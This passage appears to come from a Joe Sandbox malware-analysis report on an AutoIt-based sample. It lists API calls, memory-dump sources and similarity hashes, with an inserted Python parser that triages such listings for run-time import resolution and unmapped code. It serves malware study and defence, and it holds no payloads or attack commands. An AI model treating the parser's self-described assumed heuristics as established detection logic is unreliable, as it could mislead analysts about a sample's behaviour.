• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Message$Translate$AcceleratorDispatchPeekSleep
• String ID:
• API String ID: 3288985973-0
• Opcode ID: 7bddd8c46f746aa2b8f9d19021201b8be199dd98609c474d7c5f3fb4db680a35
• Instruction ID: 729bfffeb020d6539bb2428a248cbc404e4c94aa805ee4917fd1828e3118c7f2
• Opcode Fuzzy Hash: 7bddd8c46f746aa2b8f9d19021201b8be199dd98609c474d7c5f3fb4db680a35
• Instruction Fuzzy Hash: AAF05E306143809BEB34DBA08C89FAA73BAEB85311F144928EA4AD70C0DB30958DCB35
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00DC2CD4,?,?,?,00000004,00000001), ref: 00DC2FF2
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00DC2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DC3006
• CloseHandle.KERNEL32(00000000,?,00DC2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DC300D
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode ID: 8af633804caa6293e633edee2c063279c370ef987ee77e4587902a383ce3d033
• Instruction ID: 2502be9af7cfc28568ff845b9b14b99a8a909df65b0c31e3b3c1e6d832d237dd
• Opcode Fuzzy Hash: 8af633804caa6293e633edee2c063279c370ef987ee77e4587902a383ce3d033
• Instruction Fuzzy Hash: A6E0863269035077D2302755BC4DF8B3E1CDB86B71F104214FB19BA1D046A0150252B8
APIs
• __Init_thread_footer.LIBCMT ref: 00D617F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: CALL
• API String ID: 1385522511-4196123274
• Opcode ID: 22a4b8de83364fce16a7a89fbe43588bd2b9bc2a8585b2ca26df262f1e5bf1e5
• Instruction ID: 812de04ce339e54d727c8ff13ddd947a26524146386c1bb702349db9b33265b0
• Opcode Fuzzy Hash: 22a4b8de83364fce16a7a89fbe43588bd2b9bc2a8585b2ca26df262f1e5bf1e5
• Instruction Fuzzy Hash: 3E224878608241DFC714DF24C490A2ABBF1FF89314F1C895DF5968B2A2D771E945CBA2
APIs
• _wcslen.LIBCMT ref: 00DC6F6B
  • Part of subcall function 00D54ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54EFD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: LibraryLoad_wcslen
• String ID: >>>AUTOIT SCRIPT<<<
• API String ID: 3312870042-2806939583
• Opcode ID: e6b243bbc59c12d291bb2c26f29d1fe53fabb9556934d383d9015f697d95f68f
• Instruction ID: 23bfc15971c7d1375d97d6a57c5ad97354a8e9544f77f12e46744c47e2462780
• Opcode Fuzzy Hash: e6b243bbc59c12d291bb2c26f29d1fe53fabb9556934d383d9015f697d95f68f
• Instruction Fuzzy Hash: E4B14D311082029FCB14EF24C491DAAB7E5EF94315F58895DFC9697262EB30ED49CBB2
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: __fread_nolock
• String ID: EA06
• API String ID: 2638373210-3962188686
• Opcode ID: 4eecfad19ad3b848eccc18ec3a737bc25e6866e3eb7a22fcfa2fb402868e7272
• Instruction ID: ba9e34c3c30d4497f3d42e1a1d30f0ffda2e0a3c3cdfa78a94ebc88ac8e82a2e
• Opcode Fuzzy Hash: 4eecfad19ad3b848eccc18ec3a737bc25e6866e3eb7a22fcfa2fb402868e7272
• Instruction Fuzzy Hash: 750192729442586EDB18C7A88856EAEBBF8DB05305F04859EE196D2181E5B4E6088B70
                                                                                                            APIs
                                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D53908
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: IconNotifyShell_
                                                                                                            • String ID:
                                                                                                            • API String ID: 1144537725-0
                                                                                                            • Opcode ID: 033b4ed371677a2de72195c0837a88de16786aef1224d9f3060bce4424bc762b
                                                                                                            • Instruction ID: 664621616f68acf8f17e935f85b9e93a9badbe9c7dac3d90804eb6dcf744a287
                                                                                                            • Opcode Fuzzy Hash: 033b4ed371677a2de72195c0837a88de16786aef1224d9f3060bce4424bc762b
                                                                                                            • Instruction Fuzzy Hash: BD31C1B06043008FDB21DF65D884797BBE8FB59349F04096EFD9A97240E771AA48CB62
                                                                                                            APIs
                                                                                                              • Part of subcall function 015D6610: GetFileAttributesW.KERNELBASE(?), ref: 015D661B
                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000), ref: 015D6ED8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734196376.00000000015D5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015D5000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_15d5000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesCreateDirectoryFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3401506121-0
                                                                                                            • Opcode ID: 25a665a401adf69462e8694e49104ee4a4af0262a16e34221b4f10e6e7f4d893
                                                                                                            • Instruction ID: 438cac08a82c4c008c31d2fc5f00647df39c94e2507656e96a52f2ad42182a62
                                                                                                            • Opcode Fuzzy Hash: 25a665a401adf69462e8694e49104ee4a4af0262a16e34221b4f10e6e7f4d893
                                                                                                            • Instruction Fuzzy Hash: 5551833191020996EF24EFA4C854BEF733AFF58700F004668F609EB290EB799B45CB65
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                            • Instruction ID: a9a38d426ef04697e135e2500f5b21108c20a368af460b60d3a12ce8a6179035
                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                            • Instruction Fuzzy Hash: 4731F275A00509DBC718CF59E4C0969FBA2FF49300B2986A5E809CB656D731EDC1CBE0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D54E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D54EDD,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E9C
                                                                                                              • Part of subcall function 00D54E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D54EAE
                                                                                                              • Part of subcall function 00D54E90: FreeLibrary.KERNEL32(00000000,?,?,00D54EDD,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54EC0
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54EFD
                                                                                                              • Part of subcall function 00D54E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D93CDE,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E62
                                                                                                              • Part of subcall function 00D54E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D54E74
                                                                                                              • Part of subcall function 00D54E59: FreeLibrary.KERNEL32(00000000,?,?,00D93CDE,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E87
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$Load$AddressFreeProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 2632591731-0
                                                                                                            • Opcode ID: dbdd651b71f823469cab0f352a483d27f021380856c1cab856f2381d68708c5d
                                                                                                            • Instruction ID: 00ecd3f08845d7e419f85afaec90f678cd1afaa4ced6883f7e69387e4ac65647
                                                                                                            • Opcode Fuzzy Hash: dbdd651b71f823469cab0f352a483d27f021380856c1cab856f2381d68708c5d
                                                                                                            • Instruction Fuzzy Hash: A9110132610305ABCF20BB68DC12FAD77A4EF40716F10842DFD42AA1C1EE709A899B71
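The function listing above is far easier to triage as a per-function API inventory than as thousands of bullet lines, and the most useful pivots are buried in the call-site arguments (the literal `Wow64DisableWow64FsRedirection` and `kernel32.dll` passed to `GetProcAddress` and `LoadLibraryA`) and in the `based on PE` flag of each dump. The Python parser below is an added example, not part of the Joe Sandbox report or its tooling. It reads entries in the shape shown on this page (an `APIs` heading, optional `Part of subcall function` lines, a `Source File` line carrying `Offset` and `based on PE`, and the `API ID` line), and its sample input is a few lines copied from this section; an entry that has no `APIs` heading at all, as some entries on this page do, is started at its `Memory Dump Source` line instead. The parser reads `based on PE: false` as a dump region that was not backed by a mapped image, which for a packed sample is where unpacked code runs; that reading, the finding labels and the helper names `parse_listing`, `literal_args` and `findings` are this example's own assumptions, not Joe Sandbox's.

```python
import re
from collections import defaultdict

# Constructed sample input: lines copied in the shape of the function listing
# above (three entries; hashes and other unused fields left out).
SAMPLE_LISTING = """\
APIs
  • Part of subcall function 00D54E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D54EDD,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E9C
  • Part of subcall function 00D54E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D54EAE
  • Part of subcall function 00D54E90: FreeLibrary.KERNEL32(00000000,?,?,00D54EDD,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54EC0
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54EFD
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
Similarity
• API ID: Library$Load$AddressFreeProc
APIs
  • Part of subcall function 015D6610: GetFileAttributesW.KERNELBASE(?), ref: 015D661B
• CreateDirectoryW.KERNELBASE(?,00000000), ref: 015D6ED8
Memory Dump Source
• Source File: 00000000.00000002.1734196376.00000000015D5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015D5000, based on PE: false
Similarity
• API ID: AttributesCreateDirectoryFile
APIs
  • Part of subcall function 00D84C7D: RtlAllocateHeap.NTDLL(00000008,00D51129,00000000,?,00D82E29,00000001,00000364,?,?,?,00D7F2DE,00D83863,00E21444,?,00D6FDF5,?), ref: 00D84CBE
• _free.LIBCMT ref: 00D8506C
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
Similarity
• API ID: AllocateHeap_free
"""

# One API reference line: optional subcall prefix, Api.MODULE(args), ref: addr.
# The argument list is optional because CRT entries (e.g. _free.LIBCMT) have none.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
SOURCE_RE = re.compile(r"Offset:\s*(?P<off>[0-9A-F]+),\s*based on PE:\s*(?P<pe>true|false)")
HEX_RE = re.compile(r"^[0-9A-F]{8}$")  # 8-hex-digit addresses/constants are not pivots


def parse_listing(text):
    """Group the listing into one record per function entry (assumed layout)."""
    entries, cur = [], None

    def new():
        nonlocal cur
        cur = {"api_id": "", "offset": "", "based_on_pe": None,
               "direct": [], "subcalls": defaultdict(list)}
        entries.append(cur)

    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            new()
        elif line == "Memory Dump Source":
            if cur is None or cur["offset"]:  # entry with no APIs heading
                new()
        elif cur is None:
            continue
        elif line.startswith("• Source File:"):
            m = SOURCE_RE.search(line)
            if m:
                cur["offset"] = m.group("off")
                cur["based_on_pe"] = m.group("pe") == "true"
        elif line.startswith("• API ID:"):
            cur["api_id"] = line.split(":", 1)[1].strip()
        else:
            m = CALL_RE.match(raw)
            if m:
                args = m.group("args").split(",") if m.group("args") is not None else []
                call = (m.group("api"), m.group("mod"), args, m.group("ref"))
                if m.group("sub"):
                    cur["subcalls"][m.group("sub")].append(call)
                else:
                    cur["direct"].append(call)
    return entries


def _all_calls(entry):
    for calls in [entry["direct"], *entry["subcalls"].values()]:
        yield from calls


def literal_args(entry):
    """Call-site arguments worth pivoting on: not '?' and not a bare hex value."""
    return [a for _api, _mod, args, _ref in _all_calls(entry)
            for a in args if a != "?" and not HEX_RE.match(a)]


def findings(entry):
    """Example triage labels (this example's own, not Joe Sandbox categories)."""
    names = {c[0] for c in _all_calls(entry)}
    out = []
    if any(n.startswith("LoadLibrary") for n in names) and "GetProcAddress" in names:
        out.append("resolves imports at run time")
    if {"GetFileAttributesW", "CreateDirectoryW"} <= names:
        out.append("creates a directory after checking whether it exists")
    if entry["based_on_pe"] is False:
        out.append("runs from a region not backed by a PE image (offset %s)" % entry["offset"])
    return out


if __name__ == "__main__":
    for e in parse_listing(SAMPLE_LISTING):
        print(e["api_id"], e["offset"], findings(e), literal_args(e))
```

Run against the whole report export rather than the embedded sample, the same three helpers give a list of every function entry with its literal strings and which ones live in non-image memory, which is the short list worth opening in the dump.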
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __wsopen_s
                                                                                                            • String ID:
                                                                                                            • API String ID: 3347428461-0
                                                                                                            • Opcode ID: bf786b62cae88eafb9a49b9845fdb3cc65200ed53b5adf579086dc554a715d9e
                                                                                                            • Instruction ID: 69abb877580854b17a5a6d80f3db412d9bf08a541f6b198af3e376b60c292b2f
                                                                                                            • Opcode Fuzzy Hash: bf786b62cae88eafb9a49b9845fdb3cc65200ed53b5adf579086dc554a715d9e
                                                                                                            • Instruction Fuzzy Hash: C311487290420AAFCF15DF58E94099A7BF9EF48300F144059FC08AB312DB30DA11DBA4
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D84C7D: RtlAllocateHeap.NTDLL(00000008,00D51129,00000000,?,00D82E29,00000001,00000364,?,?,?,00D7F2DE,00D83863,00E21444,?,00D6FDF5,?), ref: 00D84CBE
                                                                                                            • _free.LIBCMT ref: 00D8506C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 614378929-0
                                                                                                            • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                            • Instruction ID: fb42c13ab20ef36b42695174b6d28e910e7868611618cd7a9c9d95fb28adc347
                                                                                                            • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                            • Instruction Fuzzy Hash: 96016D722047056BE331DF69E881A9AFBECFB89370F29051DE184832C0EB30A805C7B4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                            • Instruction ID: d45bcf2a29ab32ce3b73ad6ed3da7c20221066eb6985e67b197c8c477e86b5bf
                                                                                                            • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                            • Instruction Fuzzy Hash: B7F02832511A10A6C7313B698C06B5E339DDF56330F148B55F829931D2FB74D8028BB5
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,00D51129,00000000,?,00D82E29,00000001,00000364,?,?,?,00D7F2DE,00D83863,00E21444,?,00D6FDF5,?), ref: 00D84CBE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 93a5b6fddd738c607a743bd6b363147c7b36d1f813790d7a1415fa1eee8c9fd0
                                                                                                            • Instruction ID: 6c86ef5b894438337f6b5cc8b494d7a48b907f3cd0fcaaf7b7617814bf913413
                                                                                                            • Opcode Fuzzy Hash: 93a5b6fddd738c607a743bd6b363147c7b36d1f813790d7a1415fa1eee8c9fd0
                                                                                                            • Instruction Fuzzy Hash: ACF0BE3160332677DB217F629D09B6A778CAF917A0B198125B819EA281DF70D80187B0
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00E21444,?,00D6FDF5,?,?,00D5A976,00000010,00E21440,00D513FC,?,00D513C6,?,00D51129), ref: 00D83852
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: e0bd3288fa86173ef950f4c9ba164bf532c7d38d7a5429e05e17f1fa26decefd
                                                                                                            • Instruction ID: bf116a9ed57d66ae5681708e982176cd9f1c9e4b66e57c7404e1529022ef22b8
                                                                                                            • Opcode Fuzzy Hash: e0bd3288fa86173ef950f4c9ba164bf532c7d38d7a5429e05e17f1fa26decefd
                                                                                                            • Instruction Fuzzy Hash: BBE065312023245BD63137679C05F9A7669EF42FB0F194125BC5DA6591EB61DE0183F1
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(?,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54F6D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeLibrary
                                                                                                            • String ID:
                                                                                                            • API String ID: 3664257935-0
                                                                                                            • Opcode ID: 9b56550389cd906e718647d055f511e5e76f9ebdebcbecc5729402b2f4ef9214
                                                                                                            • Instruction ID: 91ad6a5c7c62af4d1b8590a5e35989a5d6a63aa76c9d2a4493fa2a0075a393b8
                                                                                                            • Opcode Fuzzy Hash: 9b56550389cd906e718647d055f511e5e76f9ebdebcbecc5729402b2f4ef9214
                                                                                                            • Instruction Fuzzy Hash: A6F01571109752CFDB349F68D490866BBE4AF1432A324896EE9EA86621C7319888DF21
                                                                                                            APIs
                                                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D52DC4
                                                                                                              • Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
